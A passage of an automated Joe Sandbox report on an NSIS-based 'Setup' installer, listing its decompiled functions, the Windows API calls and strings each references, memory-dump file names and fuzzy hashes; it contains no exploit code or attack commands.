Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,AuditHappening,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,AuditHappening,AuditHappening,00000000,00000000,AuditHappening,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424576,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424576,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424576,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user cancel, xrefs: 00401B93
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: error, user abort, xrefs: 00401B53
AuditHappening, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user retry, xrefs: 00401B40
File: error creating "%s", xrefs: 00401AF0

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: AuditHappening$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
API String ID: 4286501637-1591570721
Opcode ID: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Null, xrefs: 004036AA
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Error launching installer, xrefs: 00403603
soft, xrefs: 004036A1
Inst, xrefs: 00403698

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,00424576,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

vEB, xrefs: 0040346F, 0040348A, 00403513
... %d%%, xrefs: 004034C8
pAB, xrefs: 004033AB
(]C, xrefs: 004033FD

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$pAB$vEB
API String ID: 651206458-396865716
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,00424576,74DF23A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,00424576,74DF23A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424576,74DF23A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424576,74DF23A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNEL32(0092DF88), ref: 00402387

Strings

Pop: stack empty, xrefs: 00401F2C
AuditHappening, xrefs: 00401EFB, 00401F00, 00401F1A
Exch: stack < %d elements, xrefs: 00401ED8

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: AuditHappening$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-3334197172
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
AuditHappening, xrefs: 00402770
<RM>, xrefs: 00402713

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$AuditHappening$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-4294291212
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424576,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424576,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424576,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.1684798498.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1684786690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684813471.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684825730.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684907816.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
